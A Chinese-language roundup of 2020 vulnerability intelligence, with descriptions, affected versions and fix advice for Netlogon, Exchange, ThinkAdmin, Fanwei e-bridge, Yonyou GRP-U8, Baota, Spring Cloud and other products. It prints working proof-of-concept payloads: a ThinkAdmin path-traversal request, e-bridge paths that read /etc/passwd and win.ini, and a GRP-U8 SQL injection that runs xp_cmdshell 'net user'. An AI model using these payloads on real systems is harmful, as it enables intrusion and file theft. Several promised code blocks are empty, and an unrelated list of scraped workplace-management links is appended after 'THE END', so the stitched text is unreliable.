重大网络行动漏洞情报整理(持续更新)

2020年8月11日,微软发布了2020年8月份安全更新通告,其中包含了CVE-2020-1472的漏洞修复,CVE-2020-1472是的Netlogon特权提升漏洞,CVSS评分10.0。该漏洞源于Netlogon远程协议所使用的加密身份验证方案中的一个问题,该问题可用于更新计算机密码。攻击者可以使用此新密码可以控制域控制器并窃取域管理员的凭据。

漏洞危害:

当攻击者使用Netlogon远程协议(MS-NRPC)建立与域控制器连接的易受攻击的Netlogon安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。要利用此漏洞,未通过身份验证的攻击者需要将MS-NRPC连接到域控制器,以获取域管理员访问权限。

影响范围:

WindowsServer2008R2forx64-basedSystemsServicePack1

WindowsServer2008R2forx64-basedSystemsServicePack1(ServerCoreinstallation)

WindowsServer2012

WindowsServer2012(ServerCoreinstallation)

WindowsServer2012R2

WindowsServer2012R2(ServerCoreinstallation)

WindowsServer2016

WindowsServer2016(ServerCoreinstallation)

WindowsServer2019

WindowsServer2019(ServerCoreinstallation)

WindowsServer,version1903(ServerCoreinstallation)

WindowsServer,version1909(ServerCoreinstallation)

WindowsServer,version2004(ServerCoreinstallation)

漏洞验证:

首先需要域控的DC名,可以通过Netbios-ns端口进行获取,代码如下:

修复方案:

配置自动更新的方式:

通过Windows操作系统中的自动更新功能进行更新:

若要自己打开“自动更新”,请按照以下步骤操作:

1.单击“开始”,单击“运行”,键入wscui.cpl,然后单击“确定”。

2.单击“自动更新”。

3.选择自动更新选项:

由于对cmdlet参数的验证不正确,MicrosoftExchange服务器中存在一个远程执行代码漏洞,该漏洞使攻击者可以通过向受影响的ExchangeServer发送特制电子邮件来在SYSTEM执行代码。目前

MicrosoftExchangeServer2016CumulativeUpdate16MicrosoftExchangeServer2016CumulativeUpdate17MicrosoftExchangeServer2019CumulativeUpdate5MicrosoftExchangeServer2019CumulativeUpdate6

漏洞复现:

目前MSF上已经上线CVE-2020-16875的利用脚本:

获取ExchangeServer版本号,获取方式可参考如下:

获取到版本好之后,查看是否受影响:

受影响的话,则直接下载对应的安全更新包进行更新即可。

参考链接:

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

Thinkadmin版本小于≤2020.08.03.01

POC:

POST/admin.htmls=admin/api.Update/nodeHTTP/1.1Host:xxxxxxAccept:*/*Accept-Language:enUser-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;Win64;x64;Trident/5.0)Connection:closeContent-Type:application/x-www-form-urlencodedContent-Length:22rules=%5B%22.%2F%22%5D复现:

获取版本信息:

泛微云桥是一个为了满足用户提出的阿里钉钉与泛微OA集成需泛微0A云桥e-bridge其/wxjsapi/saveYZJFile接口可以读取文件内容并保存,而后可通过/file/fileNoLogin/{id},读取文件内容。

主要影响2018-2019版本

结果中提取id值,拼接到/file/fileNoLogin/{id}中即可读取数据,读取成功

windows平台可读取c://windows/win.ini文件用于漏洞验证,Linux下则读取etc/passwd文件进行验证

paths={"linux":"/wxjsapi/saveYZJFilefileName=test&downloadUrl=file:///etc/passwd&fileExt=txt","windows":"/wxjsapi/saveYZJFilefileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt"}修复方案:

尽快升级到最新版本

用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。其GRP-U8行政事业内控管理软件特定版本存在SQL注入漏洞,可用于命令执行执行。

POST/ProxyHTTP/1.1Accept:Accept:*/*Content-Type:application/x-www-form-urlencodedUser-Agent:Mozilla/4.0(compatible;MSIE6.0;)Host:hostContent-Length:357Connection:Keep-AliveCache-Control:no-cachecVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexecxp_cmdshell'netuser'输出md5值,用于poc验证:

使用MSSQLxp_cmdshell执行命令

联系用友官方获得安全升级方案

浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司,齐治运维堡垒机服务端存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。该漏洞为2019年的洞,CNVD号为CNVD-2019-20835。

建议尽快更新补丁至最新,如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助

参考资料:

威胁探针设备版本

复现过程:

官方辟谣:

绿盟已经进行辟谣,非hw期间0day。

天融信数据防泄漏系统越权修改管理员密码,该漏洞为2020年8月17号收到的情报,非9月11号开始的HW0day。

攻击者可以越权修改管理员的密码。

深信服EDR某处存在远程命令执行漏洞

<3.2.21

poc:

Linux版本7.4.2版本

Linux测试版本7.5.14版本

Windows版6.8版本

直接访问888端口上的pma目录

关于Linux面板7.4.2及Windows面板6.8,宝塔官方已发布紧急安全更新。

1.建议Linux版本7.4.2版本更新到,宝塔linux正式版7.4.3(安全版本),测试版本7.5.14的用户升级到宝塔linux测试版本7.5.15(安全版本)

2.Windows版本6.8版本的用户更新到以下版本,Windows正式版6.9.0(安全版本)

SpringCloudNetflix,2.2.4之前的2.2.x版本,2.1.6之前的2.1.x版本以及较旧的不受支持的版本允许应用程序使用HystrixDashboardproxy.stream端点向服务器托管可访问的任何服务器发出请求仪表板。恶意用户或攻击者可以将请求发送到不应公开公开的其他服务器。

SpringCloudNetflix

漏洞成因:

请求proxy.stream的端点的时候将会获取orign参数。

然后orign参数将被拼接为proxyUrl并请求,请求的URL没有做限制,导致回显型SSRF

THE END
1.为什么部门管理越乱,领导越高兴?这3个秘密你绝对想不到!看透职场“乱象”:为什么领导都希望管理“乱”一点?你有没有发现,很多公司的部门之间,总会出现各种纠纷和扯皮?你可能尝试过提出高效的解决方案,却发现领导根本不予理会,甚至事情最后还是按照原本混乱的方式解决。你百思不得其解:明明有更有效率的办法,领导为什么偏偏喜欢“乱”呢?其实,很多时候领导不是不知道https://baijiahao.baidu.com/s?id=1817930922152316363&wfr=spider&for=pc
2.管理中的放权越权和授权薛洋从打工开始到自己开公司,到开工厂,现在又到了打开的阶段,这一路走来确实有点讽刺,但不管怎么说,在这起伏中薛洋还是学到了许多东西,特别是在管理这一方面也有自己的一点小小见解。 管理是一门博大精深的学问,不是我等用一篇小小的博客就能说得清楚的。就我自己碰到的问题来谈谈放权、授权和越权吧! https://blog.sina.com.cn/s/blog_9b648a2a010158d8.html
3.越权经营管理案例分享5个越权经营管理案例,揭示企业管理漏洞越权经营管理是企业管理中常见的问题,在实际工作中也经常会遇到各种越权经营管理的案例。在这篇文章中,我将结合实际案例,从不同维度来分享一些越权经营管理案例,并针对这些案例进行深入分析,希望能对大家有所帮助。 音/视频格式不支持,或未找到可用资源 刷新 https://hsy.chanjet.com/hsyzg/c5bfdb6444100.html
4.“三员系统”中常见的越权问题在上述安全问题测试方法的前提是获取到其他用户认证信息,而实际应用场景中需要获取其他管理员认证信息虽然很困难,但在现今层出不穷的网络攻击手段下,我们不得不关注这些安全问题的本身。造成“三员”中越权问题的主要原因在于对于身份认证不严格,角色和功能绑定存在遗漏,因此在企业重要的应用系统中建议在服务端进行用户和https://www.51cto.com/article/617686.html
5.越权通过修改参数获取管理员权限Track知识社区这就是一个平行越权 垂直越权: 我们去到物品报修那里看看 随便输入点东西看看 并抓一个包 可以看到cookie有admin和shenfen(身份验证)两个关键词 【这里的已经改了 原本是2和0的】 一开始我们尝试把shenfen改为1 很高兴 变成管理员了 但是….. 说明这个shenfen只进行对前端代码的一个校验?(我是这样理解的) https://bbs.zkaq.cn/t/6736.html
6.综合评估法和经评审的最低投标价法适用范围比较研究4.招投标管理部门越权管理,对招标文件编制干涉过多 按照行政许可,招标过程和招标文件实行备案制,招标人作为招标项目的责任人,有权力选择科学的、适合招标项目特点的评标方法,招标文件只需向管理部门事后报告即可。但在很多地方和领域,招投标管理部门对招标文件实行审核制,招标文件的编写及评审必须按照主管部门、甚至某个http://publish.bcactc.com/bjacpb/contents/117/10863.html
7.国务院批转国家土地管理局关于部分地方政府越权批地情况报告的通知国务院同意国家土地管理局《关于部分地方政府越权批地情况的报告》,现转发给你们,请遵照执行。 鉴于目前越权批地的情况十分严重,对《中华人民共和国土地管理法》(以下简称《土地管理法》)实施以来审批建设用地的情况,认真进行一次清理是很必要的。各地区和有关部门对清查出来的越权批地问题要进行严肃处理,并将清理情况http://www.law-lib.com/cpd/law_detail.asp?id=51369
8.内部控制十大漏洞公司集体舞弊会关闭公司吗五、管理越权带来的内部控制风险 如果单位内部行使控制职能的管理人员滥用职权、喜欢越俎代庖,或为某种私利越权行事,加上知情人的官本位思想、洋奴哲学和事不关己高高挂起的痼疾,往往使越权发号施令畅通无阻。很多领导表面上大谈特谈内部控制制度的必要性和紧迫性,骨子里始终认为自己可以凌驾于内部控制制度之上,内部控https://blog.csdn.net/hbqhdlc/article/details/6930105
9.高层管理者2,越权管理.每个企业由于种种原因都有不同的职务分工.我们每个人都要做好自己份内之事.但如果你参与了不属于你权力范围的管理,那么你就会影响他人管理的效益,因为你并不明白他人为什么要进行那样的管理,你的越权就是不理智的行为. 3,越级管理. 事必躬亲,是对中层管理者和员工智慧的不信任和扼杀,往往事与愿违。https://baike.sogou.com/v7881942.htm
10.常见的企业管理问题有哪些?不同公司企业管理问题以及解决方案→3、企业里面会出现很多越权管理的现象。 4、优秀的人才进不来,甚至进来了也会被排挤出去。 解决方法: 1、不管是谁,先把他所做的事,用数据统计出来,用数据说话。 2、当企业人数少时可以靠人盯人的方式来进行管理,但当人多时必须要依靠流程进行管理。 https://www.maigoo.com/goomai/229459.html
11.物流管理心得体会(精选22篇)其四,各个主管出现越权管理与指挥,管理有些混乱,只是有些工作得不到及时的安排,有些问题也没得到及时的处理。 好在这些问题及时发现,CEO也在工作总结大会上做了纠正与处理,相信我们的这个团队会在今后的工作中做得更好,相信我们公司的明天会更好,相信我们。 https://www.unjs.com/fanwenwang/xdth/20230516132249_7104294.html
12.重磅消息:货运车辆,可以办理个人营运证了先说一下车辆挂靠。车辆挂靠的运输公司无非就是办理营运证,收取挂靠费,有直接管理权限,不参加实际经营,双方有协议,如有一方违约,另一方可以随时提出终止协议。但太多的挂靠公司越权管理,造成卡友们提档难,过户难等问题,违规收费现象,特别普遍,这样的公司显然是违法经营。 https://www.yoojia.com/ask/19-12094123579106014109.html
13.(职业经理培训)管理学原理案例分析全集卓越管理 | 121页| 1.49MB | 0次下载 | 0.0 (0人评价) 我要评价: 投诉 举报 用手机看文档 下载 开通VIP (职业经理培训)管理学原 理案例分析全集 管理学原理案例分析全集 第一章案例分析 案例一 节约后的致谦 一个有700张床位的医院,由于为就诊病人专设的停车场常常拥挤而导致病人减 少,影响https://doc.mbalib.com/view/b96865bcb489baa647f5497e1366f161.html
14.杨轶:突破成长困境之流程管理20200326见图2 的管理体系中,我们主要谈谈“控制系统” 中的 “流程”。 二、流程管理--增加例行事项,减少例外事项,不断简化流程,是提高组织效率的基础。 1、例行事项 凡具有重复性的例常工作,都应制定规则和程序,授权下级处理。管理者只负责例外事项。规则和程序是不越权管理的基础。 https://www.jianshu.com/p/1c01223cae6e